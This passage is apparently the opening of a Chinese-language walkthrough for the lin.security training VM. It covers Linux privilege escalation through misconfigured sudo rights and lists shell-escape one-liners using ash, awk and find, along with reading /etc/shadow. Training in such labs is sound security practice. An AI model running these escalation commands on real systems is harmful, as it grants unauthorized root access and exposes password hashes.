0x00 in.security靶场介绍
大家好,本期丹丹妹,给大家带来一个Linux 配置问题导致提权的靶场通关手册,也就是lin.security靶场。
lin.security靶场是一个基于Ubuntu(18.04 LTS)的Linux虚拟机,靶场提供许多权限提升的漏洞供我们练习关于linux权限的相关知识,下面是这个靶场的下载链接:
https://in.security/downloads/lin.security_v1.0.ova。
这个是一个vmware的ova文件,下载后之后使用vmware虚拟机软件即可打开。登陆账户为 bob/secret,配置网络可使用NAT或者桥接模式,注意的是18.04 LTS配置网络使用netplan来配置,所以要配置网卡先使用ifconfig -a来查看。
0x01 用户的sudo权限
sudo其实是很常用的命令了,sudo权限则是root把本来只能超级用户执行的命令赋予普通用户执行,这里的命令指的是系统命令,对于linux来说一切皆是文件,所以系统命令也是一个文件。
一般来讲当管理员需要某个用户在执行root权限的命令时,会去配置sudo。具体是修改/etc/sudoers这个文件。但是普通用户其实是查看和操作这个文件的,他只能查看自己是否被配置了sudo权限。普通用户可以采用sudo -l这个命令来查看自己是否有sudo配置。
我们可以发现bob这个用户可以执行很多的命令,利用这些命令可以简单直接提升到root权限。
/bin/ash
sudo /bin/ash
/usr/bin/awk
查看密码文件/etc/shadow
获取shell
sudo /usr/bin/awk 'BEGIN {system("/bin/bash")}'
/usr/bin/curl
/usr/bin/find
获取shell
find . -exec /bin/sh \; -quit
可以发现,